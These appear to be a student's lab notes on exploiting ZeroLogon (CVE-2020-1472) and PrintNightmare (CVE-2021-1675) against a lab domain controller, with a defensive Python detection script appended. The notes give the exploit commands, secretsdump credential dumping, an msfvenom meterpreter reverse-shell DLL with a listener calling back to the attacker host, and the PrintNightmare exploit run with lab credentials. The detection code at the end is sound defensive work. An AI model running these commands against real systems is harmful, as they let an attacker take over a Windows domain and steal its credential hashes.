NEVER run ZeroLogon!
PrintNightmare or Sam the Admin can maybe be used, with permission. You can check for the vulnerability without running the exploit (like EternalBlue).
What is ZeroLogon?
2020 exploit, a very critical bug.
Resets the admin password to null (empty), which is why it has to be restored afterwards (see below).
Check:
python3 zerologon_tester.py HYDRA-DC 192.168.218.136
Exploit the DC:
python3 cve-2020-1472-exploit.py HYDRA-DC 192.168.218.136
secretsdump.py -just-dc MARVEL/HYDRA-DC\$@192.168.218.136
Done.
To restore:
secretsdump.py administrator@192.168.218.136 -hashes adminHashHere
Find the admin plain password hex in the output and copy it.
python3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip 192.168.218.136 -hexpass pasteHexHere
What is PrintNightmare?
Only needs a user account. Takes advantage of the print spooler: it lets users add printers, and it runs with SYSTEM privileges.
Check:
rpcdump.py @192.168.218.136 | egrep 'MS-RPRN|MS-PAR'
If those interfaces are listed, it is vulnerable:
Create a shell DLL to host:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.218.128 LPORT=5555 -f dll > shell.dll
(New terminal)
Open Metasploit for meterpreter shell:
msfconsole
use multi/handler
options
No payload is set, so set it to the one we built with msfvenom:
set payload windows/x64/meterpreter/reverse_tcp
options
Set the rest of the options for the listener (meterpreter):
set LHOST 192.168.218.128   # Kali IP
set LPORT 5555              # the port we set in msfvenom
run
(New terminal)
We need a file share:
smbserver.py share `pwd`
(New terminal)
(the CVE-2021-1675.py script is in the impacket directory under ~):
python3 CVE-2021-1675.py marvel.local/fcastle:'Password1'@192.168.218.136 '\\192.168.218.128\home\kali\shell.dll'
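A defender-side counterpart to both the ZeroLogon and PrintNightmare sections above, added here as an example (not from the course or from impacket): it runs detection logic over constructed Windows event records. The event IDs are the standard ones (Security 4742, Netlogon 5827-5829, PrintService 808 and 316); the record field names, timestamps and sample values are assumptions.

```python
# Constructed sample events (not real logs), shaped like the fields a SIEM would
# normalise out of the Security, System and PrintService channels on HYDRA-DC.
SAMPLE_EVENTS = [
    {"ts": 100, "log": "Security", "id": 4742, "subject": "ANONYMOUS LOGON", "target": "HYDRA-DC$"},
    {"ts": 101, "log": "System", "id": 5829, "subject": "HYDRA-DC$", "target": ""},
    {"ts": 200, "log": "Security", "id": 4742, "subject": "MARVEL\\administrator", "target": "SPIDERMAN$"},
    {"ts": 300, "log": "Microsoft-Windows-PrintService/Admin", "id": 808, "subject": "fcastle",
     "target": "\\\\192.168.218.128\\home\\kali\\shell.dll"},
    {"ts": 302, "log": "Microsoft-Windows-PrintService/Operational", "id": 316, "subject": "fcastle",
     "target": "shell.dll"},
    {"ts": 900, "log": "Microsoft-Windows-PrintService/Operational", "id": 316,
     "subject": "MARVEL\\administrator", "target": "UNIDRV.DLL"},
]

# Netlogon events a DC with the August 2020 CVE-2020-1472 patch writes when it
# sees a vulnerable (unsigned/unsealed) secure channel connection.
NETLOGON_VULNERABLE_CHANNEL = {5827, 5828, 5829}

def is_zerologon(ev: dict) -> bool:
    """CVE-2020-1472: a computer account (name ends in $) changed by an
    unauthenticated caller, or Netlogon reporting a vulnerable secure channel."""
    anon_machine_change = (ev["log"] == "Security" and ev["id"] == 4742
                           and ev["target"].endswith("$")
                           and ev["subject"].upper() == "ANONYMOUS LOGON")
    return anon_machine_change or (ev["log"] == "System" and ev["id"] in NETLOGON_VULNERABLE_CHANNEL)

def printnightmare_hits(events: list, window: int = 60) -> list:
    """CVE-2021-1675: the spooler failing to load a plug-in DLL from a UNC path
    (808) is the strong signal; a driver registration (316) within `window`
    seconds of it corroborates the attempt. A lone 316 is normal admin activity."""
    loads = [e for e in events if e["id"] == 808 and e["log"].endswith("PrintService/Admin")
             and e["target"].startswith("\\\\")]
    hits = list(loads)
    for e in events:
        if e["id"] == 316 and any(0 <= e["ts"] - a["ts"] <= window for a in loads):
            hits.append(e)
    return hits

def triage(events) -> dict:
    """Group suspicious events by CVE, in time order."""
    ordered = sorted(events, key=lambda e: e["ts"])
    return {"CVE-2020-1472": [e for e in ordered if is_zerologon(e)],
            "CVE-2021-1675": printnightmare_hits(ordered)}

if __name__ == "__main__":
    for cve, evs in triage(SAMPLE_EVENTS).items():
        print(cve, [e["id"] for e in evs])  # CVE-2020-1472 [4742, 5829] / CVE-2021-1675 [808, 316]
```

The benign 4742 by a domain admin and the lone driver install at ts 900 are deliberately not flagged; in a real SIEM the same rules would be applied to the parsed event fields instead of this constructed list.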